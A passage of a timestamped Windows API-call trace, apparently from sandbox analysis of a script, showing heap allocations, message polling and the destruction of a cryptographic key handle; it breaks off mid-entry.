RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0099.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0099.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0099.461] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0099.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0099.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0099.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0099.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0099.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0099.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0099.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0099.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0099.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0099.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0099.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0099.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca550, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0099.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0099.463] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0099.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0099.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0099.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0099.463] CryptDestroyKey (hKey=0x41ac6c0) returned 1 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0099.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0099.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0099.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0099.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0099.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.464] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0099.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0099.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0099.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0099.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0099.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0099.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0099.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0099.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0099.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0099.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0099.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0099.465] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0099.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0099.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0099.466] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0099.466] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0099.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0099.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0099.466] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0099.466] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0099.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0099.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0099.466] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0099.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0099.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0099.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0099.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0099.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0099.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0099.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0099.468] PeekMessageW (in: lpMsg=0x144e8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8b4) returned 0 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.468] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0099.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0099.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0099.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0099.468] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0099.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0099.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0099.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0099.468] PeekMessageW (in: lpMsg=0x144e6ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6ec) returned 0 [0099.468] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0099.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0099.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0099.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0099.469] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0099.469] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.469] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0099.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0099.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0099.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0099.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0099.469] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0099.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0099.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0099.470] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0099.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0099.471] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: 